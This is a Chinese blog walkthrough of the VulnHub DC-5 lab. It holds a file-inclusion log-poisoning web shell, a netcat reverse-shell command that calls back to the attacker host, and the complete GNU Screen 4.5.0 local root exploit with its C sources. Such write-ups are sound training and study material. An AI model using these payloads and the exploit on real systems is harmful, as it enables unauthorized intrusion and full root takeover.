0
点赞
收藏
分享

微信扫一扫

靶机渗透练习73-DC5

止止_8fc8 2022-04-21 阅读 78
web安全

靶机描述

靶机地址:http://www.vulnhub.com/entry/dc-5,314/

一、搭建靶机环境

攻击机Kali

靶机

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

⬢  DC5  arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:f9:57:76       PCS Systemtechnik GmbH
192.168.9.71    08:00:27:e8:60:97       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

⬢  DC5  nmap -A -sV -T4 -p- 192.168.9.71
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-12 16:25 CST
Nmap scan report for bogon (192.168.9.71)
Host is up (0.00039s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-title: Welcome
|_http-server-header: nginx/1.6.2
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          42244/udp   status
|   100024  1          46756/udp6  status
|   100024  1          52931/tcp6  status
|_  100024  1          60025/tcp   status
60025/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:E8:60:97 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms bogon (192.168.9.71)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds

开放了80,111,60025端口

2.2枚举漏洞

2.2.1 80 端口分析

访问:http://192.168.9.71/

image-20220412162827311

看来看去,没什么可以利用的点,先来扫描一下目录

⬢  DC5  dirsearch -u http://192.168.9.71

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.9.71/_22-04-12_16-29-16.txt

Error Log: /root/.dirsearch/logs/errors-22-04-12_16-29-16.log

Target: http://192.168.9.71/

[16:29:16] Starting: 
[16:29:29] 200 -    4KB - /contact.php
[16:29:29] 301 -  184B  - /css  ->  http://192.168.9.71/css/
[16:29:31] 200 -    6KB - /faq.php
[16:29:31] 200 -   17B  - /footer.php
[16:29:32] 301 -  184B  - /images  ->  http://192.168.9.71/images/
[16:29:32] 403 -  570B  - /images/
[16:29:32] 200 -    4KB - /index.php
[16:29:43] 200 -  852B  - /thankyou.php

Task Completed
⬢  DC5  

这些页面都是主页面跳转的,都在之前看过了,也没啥东西

重新去页面看看,发现了个有趣的东西

image-20220412163328035

image-20220412163347763

image-20220412163413615

image-20220412163436522

经过一番尝试,发现这个版权的时间每次都在变,从2017-2020随机改变。

http://192.168.9.71/thankyou.php?firstname=&lastname=&country=australia&subject=

通过url的特征,恩,,,这里猜测可能存在文件包含漏洞

既然可能存在文件包含漏洞,现在需要知道thankyou.php是如何把footer.php包含的

利用wfuzz工具获取参数

wfuzz -z file,/usr/share/wfuzz/wordlist/general/common.txt http://192.168.9.71/thankyou.php?FUZZ=/etc/passwd

image-20220412165017330

所以完整的地址为

http://192.168.9.71/thankyou.php?file=footer.php

扩展

2.3漏洞利用

2.3.1 文件包含漏洞

接下来咱们读取一下,直接将footer.php改为/etc/passwd

访问:http://192.168.9.71/thankyou.php?file=/etc/passwd

image-20220412165306675

这样查看起来不方便,咱们查看一下源代码

image-20220412165356681

发现dc用户

既然可以读取密码文件,那也可以读取日志文件,方便我们读取木马文件

系统默认路径:/var/log/nginx/access.log

image-20220412165713581

根据Nginx服务的特征,我们在网站上的所有操作都将会被写入日志文件log内

由此我们可以通过这个日志文件来拿 shell

这里我们先写入phpinfo()进行探测,看一下是否可以包含成功

image-20220412170107785

我们进去日志文件查看一下,是否成功植入

image-20220412170134303

通过firefox浏览器打开(URL:http://192.168.9.71/thankyou.php?file=/var/log/nginx/access.log),发现一句话木马已经写入成功。

直接写系统执行语句,尝试能否带入命令

通过BurpSuite抓包,并写入PHP的执行系统命令

<?php passthru($_GET['hh']); ?>

进行测试,看是否外部命令是否能够正常执行的;

http://192.168.9.71/thankyou.php?file=/var/log/nginx/access.log&hh=cat%20/etc/passwd

image-20220412170336203

这里咱们可以发现外部命令已经正常执行。

通过nc命令直接进行反弹shell

命令:hh=nc 192.168.9.7 6666 -c /bin/bash
在kali上用命令:nc -lvvp 6666对端口7777进行监听;

访问:http://192.168.9.71/thankyou.php?file=/var/log/nginx/access.log&hh=nc%20192.168.9.7%206666%20-c%20/bin/bash

⬢  DC5  nc -lvp 6666                    
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.7] from bogon [192.168.9.71] 51816
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

可以看到,咱们已经成功反弹shell

老套路

切换到交互模式shell

python -c "import pty;pty.spawn('/bin/bash')"

2.4权限提升

2.4.1 信息收集

sudo -l发现没有sudo命令

查找一下suid程序:find / -perm -u=s -type f 2>/dev/null

www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

https://gtfobins.github.io/查找一下,发现/bin/screen-4.5.0可利用

image-20220412171026703

由于没有sudo命令,只能换个方式利用该程序

kali本地搜索一下漏洞库:searchsploit screen 4.5.0

image-20220412171236941

先试试41152.txt

⬢  DC5  searchsploit -m linux/local/41152.txt                     
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation (PoC)
      URL: https://www.exploit-db.com/exploits/41152
     Path: /usr/share/exploitdb/exploits/linux/local/41152.txt
File Type: ASCII text

Copied to: /home/kali/vulnhub/DC/DC5/41152.txt


⬢  DC5  cat 41152.txt 
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)

The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.

> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$

Donald Buczek <address@hidden>




EDB Note: Follow up ~ http://seclists.org/oss-sec/2017/q1/184#  

这个利用失败

再使用41154.sh

⬢  DC5  searchsploit -m linux/local/41154.sh
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
File Type: Bourne-Again shell script, ASCII text executable

Copied to: /home/kali/vulnhub/DC/DC5/41154.sh

⬢  DC5  cat 41154.sh 
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell#  

首先将下面这串代码编译一下

gcc -fPIC -shared -ldl -o /home/kali/vulnhub/DC/DC5/libhax.so /home/kali/vulnhub/DC/DC5/libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

然后rm -f /home/kali/vulnhub/DC/DC5/libhax.c

第二步将下面这串代码编译一下

gcc -o /home/kali/vulnhub/DC/DC5/rootshell /home/kali/vulnhub/DC/DC5/rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

修改原来41154.sh的bash文件,如下所示

#!/bin/bash
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

然后通过Python建立http服务将这几个文件上传到靶机是

image-20220412172637630

接下来就是提权了

www-data@dc-5:/tmp$ ls
ls
exp.sh  libhax.so  rootshell  screens
www-data@dc-5:/tmp$ chmod 777 exp.sh
chmod 777 exp.sh
www-data@dc-5:/tmp$ chmod 777 libhax.so
chmod 777 libhax.so
www-data@dc-5:/tmp$ chmod 777 rootshell
chmod 777 rootshell
www-data@dc-5:/tmp$ ./exp.sh
./exp.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
thisistheflag.txt
# cat thisistheflag.txt
cat thisistheflag.txt


888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 
                                                                                          
                                                                                          


Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

成功提权后,再root目录下拿到flag

总结

本靶机通过信息收集得知存在文件包含漏洞,wfuzz模糊测试参数,通过写入日志文件getshell,然后通过screen提权

  1. 信息收集
  2. dirsearch扫描目录
  3. Nignx日志文件利用
  4. screen提权
举报

相关推荐

DC系列(5)DC-5靶机渗透

靶机渗透练习72-DC4

靶机渗透练习74-DC6

靶机渗透练习70-DC2

靶机渗透练习69-DC1

靶机渗透练习76-DC8

靶机渗透练习75-DC7

dc-4 靶机渗透学习

0 条评论